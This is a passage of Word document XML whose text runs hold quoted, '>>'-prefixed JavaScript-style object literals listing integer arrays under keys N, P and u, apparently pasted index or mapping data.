        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8559AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDDEEC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDC97E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57C4BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B233198" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00327135" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2DC1B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [254, 276]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C6910" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320750CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB36E9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 8, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A741F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 4, 5, 6, 7, 9, 10, 11, 193]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AA520" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDBB41" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 0, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5858D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1635E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [193]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DCB69" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2721792D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A327AE7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA1DBAB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 21, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574EA3E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B0C10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771A9CD9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53002545" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 14, 18, 22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A2AC65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BC80D9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A7DCB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB8184" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C349CC4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296ECFC4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B254D66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01170891" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB0533A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6675CCE2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5041E65F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2FB669" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4075A333" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 13, 14, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02B92F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F87423A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304722D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9D10A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 23, 27, 40, 71, 108, 134, 140, 200, 219, 232, 249, 260, 277, 282, 283, 298, 303, 319, 343, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60948426" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E8989" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F1D8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED2FFE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56FC96" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D24F41E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5CC7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272839F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3024AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC10B6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C19E65D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A76C3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 18, 21, 22, 23, 24, 33, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EFE33B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED396F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2, 3, 1, 5, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1197C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB92CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B8A68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3979A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC7BD1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6826E8B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA0AD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DF46D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6E725" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E3F7F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186C8CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD215E6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389EDF96" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F45ED3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E69C9E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68133CAD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 27, 16, 17, 30, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450BAC89" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 37],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE6EEFD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [24, 36, 76, 123, 132, 156, 159, 166, 196, 204, 287, 291, 295, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B5D58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E8AF24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393DE6E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC90073" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 18, 25, 89, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C22F121" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53893F0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344BB2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD84F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71D1FC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1291B8D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6CF987" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 4, 5, 6, 7, 9, 10, 11, 12, 14, 15, 16, 17, 19, 20, 21, 23, 24, 25, 27, 28],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD9FB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 8, 13, 18, 22, 26, 32, 159, 166, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3EF4B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8FC73F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB7BCD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B293EFD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [12, 146, 161, 187, 189, 229, 247, 273, 290, 309]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28624FBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A1226" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B72BBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29162677" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 31]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CE622B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598FBA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [3, 4, 1, 21, 18, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA8B43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD4450" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [67, 124, 131, 159, 183, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF262AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFF70A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [19, 10, 22, 9, 14, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7507F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 22, 23, 24, 25, 26],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF2D39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [21, 39, 126, 137, 159, 248, 281, 284, 301, 311, 317, 345, 350, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36E123" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1667D841" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 3, 1, 11, 12, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFF59B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DDF36E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [142, 152, 209, 269, 299, 331]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D09EAD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696412E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F365A19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B48AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8FD549" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF63373" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4620AC20" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E783072" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 10, 11, 15, 16, 19, 21, 23, 24, 25, 27, 151]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E78A0A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A76897" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15644339" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273976E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678539DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09CA7E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA4399" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0404A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [41, 114]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF2C87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC021F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA3940" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38632BDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
